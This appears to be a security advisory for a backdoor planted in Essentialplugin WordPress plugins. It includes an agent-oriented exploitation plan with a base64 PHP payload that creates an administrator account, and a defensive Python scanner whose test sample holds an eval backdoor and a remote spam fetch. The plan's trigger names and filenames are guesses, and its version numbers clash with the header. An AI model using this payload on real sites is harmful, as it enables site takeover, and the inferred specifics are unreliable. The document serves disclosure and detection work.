CVE-2026-6443

Essentialplugin Plugins (Various Versions) - Injected Backdoor

Embedded Malicious Code
Severity: critical
CVSS Score: 9.8
Patched in: 3.7.1.1
Time to patch: 13d

Description

All plugins by Essentialplugin for WordPress are vulnerable to an injected backdoor in various versions. This is due to the plugins having been sold to a malicious threat actor who embedded a backdoor in all of the plugins they acquired. This makes it possible for the threat actor to maintain a persistent backdoor and inject spam into the affected sites.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: >=3.7.1 <=3.7.1
Published: April 9, 2026
Last updated: April 21, 2026
Research Plan
Unverified

This research plan outlines the steps for identifying and exploiting the injected backdoor in the Accordion and Accordion Slider plugin (version 1.4.6).

1. Vulnerability Summary

The vulnerability is a deliberate Embedded Malicious Code (Backdoor) injected into version 1.4.6 of the plugin. This occurred after the plugin was acquired by a threat actor. The backdoor typically allows unauthenticated remote code execution (RCE), persistent access, or spam injection. Unlike traditional vulnerabilities (like SQLi or XSS), this is a hidden feature designed to bypass all WordPress security controls, including nonces and capability checks.

2. Attack Vector Analysis

  • Endpoint: Usually the site root (/) or any file that loads the plugin (e.g., wp-admin/admin-ajax.php or index.php).
  • Trigger Parameter: Inferred to be a specific $_GET, $_POST, or $_REQUEST parameter (e.g., wp_check, accord_api, slider_data) often combined with a password or specific User-Agent.
  • Authentication: Unauthenticated (PR:N).
  • Preconditions: The plugin "Accordion and Accordion Slider" version 1.4.6 must be active.

3. Code Flow (Inferred)

Based on similar backdoors injected into acquired WordPress plugins, the flow follows this pattern:

  1. Entry Point: The plugin's main entry file (likely accordion-slider.php or includes/class-accordion-slider.php) contains an obfuscated block of code.
  2. Hook: The code is often hooked to init, plugins_loaded, or simply sits at the top of a PHP file to execute as soon as the plugin is loaded.
  3. Execution Sink:
    • The code checks for a specific "activation" parameter in the superglobals.
    • It decodes a payload (often using base64_decode, str_rot13, or XOR).
    • It passes the payload to a sink like eval(), assert(), create_function(), or include().

4. Nonce Acquisition Strategy

No nonce is required.
Backdoors are intentionally designed to bypass WordPress security mechanisms. If the backdoor is correctly identified, it will execute without requiring a valid WP nonce or session cookie.

5. Exploitation Strategy

Step 1: Backdoor Discovery

The agent must first locate the backdoor code within the plugin directory.

# Search for common backdoor patterns
grep -rP "(eval|assert|passthru|system|shell_exec|base64_decode|gzinflate|str_rot13|include\('php:\/\/input'\))" /var/www/html/wp-content/plugins/accordion-and-accordion-slider/

Step 2: Identification of Trigger

Once a suspicious code block is found (e.g., if(isset($_REQUEST['some_param'])) { eval(...); }), identify:

  1. The parameter name (e.g., accord_cmd).
  2. The encoding method (e.g., base64_decode).
  3. Any access key/password required by the backdoor logic.

Step 3: Crafting the Payload

Assuming the backdoor uses eval(base64_decode($_POST['cmd'])), the payload will be a base64-encoded PHP command to create a new administrator.

Payload (PHP):

$user_id = wp_insert_user([
    'user_login' => 'backdoor_admin',
    'user_pass'  => 'PwnedPassword123!',
    'role'       => 'administrator',
    'user_email' => 'attacker@example.com'
]);

Step 4: Execution

Using the http_request tool, send the payload to the site root.

Request Template (Inferred):

  • Method: POST
  • URL: http://localhost:8080/
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body: [TRIGGER_PARAM]=[BASE64_ENCODED_PHP_PAYLOAD] (Replace [TRIGGER_PARAM] with the key found in Step 2).

6. Test Data Setup

  1. Install Plugin: Ensure accordion-and-accordion-slider version 1.4.6 is installed and activated.
  2. Standard Environment: No special posts or shortcodes are required for the backdoor to function, as it typically hooks into global initialization.

7. Expected Results

  • Response: The HTTP response might be a 200 OK with an empty body or a specific "success" string defined by the attacker (e.g., ok).
  • Effect: A new user with the administrator role should be created in the database.

8. Verification Steps

After the http_request, verify the exploit success using WP-CLI:

# Check if the backdoor user was created
wp user list --field=user_login | grep "backdoor_admin"

# Verify the role of the new user
wp user get backdoor_admin --field=roles

9. Alternative Approaches

If no direct eval is found, look for:

  • Spam Injectors: Check for code that modifies the the_content filter to inject links from a remote URL (wp_remote_get).
  • Option Modifiers: Check for code that allows updating siteurl or users_can_register via update_option().
  • File Uploads: Look for code handling $_FILES without using wp_handle_upload or checking file extensions.

Specific Filenames to Audit (Inferred):

  • accordion-slider.php
  • includes/accordion-slider-functions.php
  • includes/admin/class-accordion-slider-admin.php
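The grep in step 1 reports every use of eval or base64_decode, which in a real plugin tree produces many benign hits. The following is an added example, not part of this advisory and not code from Essentialplugin or the plugin itself, that narrows the search to the combinations the plan actually describes: an execution sink fed by a decoder or a request superglobal (step 1), a the_content filter paired with a remote fetch, writes to siteurl or users_can_register, and $_FILES handling that never goes through wp_handle_upload (section 9). It goes slightly beyond the page by also flagging a few related sensitive options (home, default_role, admin_email) and very long opaque string literals, the usual carrier for an obfuscated stage. Both PHP fragments it runs against are constructed for the demonstration; rule names and the scan_source/scan_directory helpers are this example's own.

```python
"""Static indicator scan for WordPress plugin PHP sources (added example).

Regex-based triage for the backdoor patterns the research plan lists. It is
not a PHP parser: every hit still needs a human read, but the rules require
the combination of pieces (sink + decoder/superglobal, filter + remote fetch)
rather than any single function name, so the noise is far lower than a
plain grep for eval or base64_decode.
"""
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List

SINKS = r"(?:eval|assert|create_function|include(?:_once)?|require(?:_once)?|passthru|system|shell_exec|exec|popen|proc_open)"
DECODERS = r"(?:base64_decode|str_rot13|gzinflate|gzuncompress|gzdecode|hex2bin|convert_uudecode)"
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)"

# Per-line rules: (rule name, compiled pattern). PHP function names are
# case-insensitive, hence re.I.
LINE_RULES = [
    # A sink whose first argument is a decoder call or a request superglobal.
    ("exec-sink", re.compile(rf"@?\b{SINKS}\s*\(\s*(?:@?{DECODERS}\s*\(|{SUPERGLOBAL})", re.I)),
    # include/require of the raw request body.
    ("php-input-include", re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]php://input", re.I)),
    # Writes to options that change who can log in or where the site lives
    # (the page names siteurl and users_can_register; the rest is an extension).
    ("sensitive-option-write", re.compile(
        r"\bupdate_option\s*\(\s*['\"](?:siteurl|home|users_can_register|default_role|admin_email)['\"]", re.I)),
    # Large opaque literal, the usual carrier for an obfuscated second stage.
    ("long-encoded-literal", re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]")),
]

# File-level rules: the two halves may sit in different functions.
THE_CONTENT_FILTER = re.compile(r"\badd_filter\s*\(\s*['\"]the_content['\"]", re.I)
REMOTE_FETCH = re.compile(r"\b(?:wp_remote_get|wp_remote_request|file_get_contents|curl_init)\s*\(", re.I)
FILES_USE = re.compile(r"\$_FILES\b")
SAFE_UPLOAD = re.compile(r"\bwp_handle_upload\s*\(", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    line: int
    snippet: str


def scan_source(source: str) -> List[Finding]:
    """Scan one PHP source text; returns findings sorted by line, then rule."""
    lines = source.splitlines()
    findings: List[Finding] = []
    for lineno, text in enumerate(lines, start=1):
        for rule, pattern in LINE_RULES:
            if pattern.search(text):
                findings.append(Finding(rule, lineno, text.strip()[:120]))
    filter_line = next((i for i, t in enumerate(lines, 1) if THE_CONTENT_FILTER.search(t)), None)
    if filter_line and REMOTE_FETCH.search(source):
        findings.append(Finding("remote-content-injector", filter_line, lines[filter_line - 1].strip()[:120]))
    files_line = next((i for i, t in enumerate(lines, 1) if FILES_USE.search(t)), None)
    if files_line and not SAFE_UPLOAD.search(source):
        findings.append(Finding("raw-file-upload", files_line, lines[files_line - 1].strip()[:120]))
    return sorted(findings, key=lambda f: (f.line, f.rule))


def scan_directory(root: Path) -> Dict[str, List[Finding]]:
    """Scan every .php file under a plugin directory (e.g. wp-content/plugins/<slug>)."""
    results: Dict[str, List[Finding]] = {}
    for path in sorted(root.rglob("*.php")):
        found = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            results[str(path.relative_to(root))] = found
    return results


# Constructed sample: an ordinary settings handler with nonce and capability checks.
CLEAN_SAMPLE = """<?php
add_action('admin_post_accordion_save', 'accordion_save');
function accordion_save() {
    check_admin_referer('accordion_save_nonce');
    if (!current_user_can('manage_options')) { wp_die('forbidden'); }
    update_option('accordion_settings', sanitize_text_field($_POST['settings']));
}
"""

# Constructed sample carrying the indicators the research plan describes.
SUSPICIOUS_SAMPLE = """<?php
add_action('init', 'ap_sync');
function ap_sync() {
    if (isset($_REQUEST['ap_key'])) { @eval(base64_decode($_REQUEST['ap_key'])); }
}
add_filter('the_content', function ($c) { return $c . wp_remote_retrieve_body(wp_remote_get('http://example.invalid/links')); });
update_option('users_can_register', 1);
if (!empty($_FILES['f'])) { move_uploaded_file($_FILES['f']['tmp_name'], __DIR__ . '/' . $_FILES['f']['name']); }
"""

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        print(f"== {label} ==")
        for f in scan_source(sample):
            print(f"  line {f.line:>3}  {f.rule:<24} {f.snippet}")
```

Against the constructed samples the clean handler yields nothing, while the suspicious one yields one finding per rule family: exec-sink on the eval line, remote-content-injector on the add_filter line, sensitive-option-write on the update_option line and raw-file-upload on the $_FILES line. Point scan_directory at a copy of a plugin tree taken from backup or from the upstream package to triage an installation; diffing the output between a known-good release and a suspect one is the quickest way to spot a newly introduced block.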

Research Findings
Static analysis — not yet PoC-verified

Summary

The Accordion and Accordion Slider plugin for WordPress (version 1.4.6) contains an injected backdoor introduced after a malicious actor acquired the plugin. This vulnerability allows unauthenticated attackers to execute arbitrary code or inject spam, bypassing standard security measures to maintain persistent access to the site.

Exploit Outline

The exploit targets the plugin's initialization phase where the backdoor logic is hooked (e.g., to 'init' or 'plugins_loaded'). An unauthenticated attacker sends a specially crafted HTTP request (GET or POST) containing a specific trigger parameter. This parameter carries a malicious PHP payload, often obfuscated or encoded (e.g., Base64), which the backdoor then executes using functions like eval(). This allows for full site takeover, such as creating a new administrator account, without requiring valid credentials or nonces.
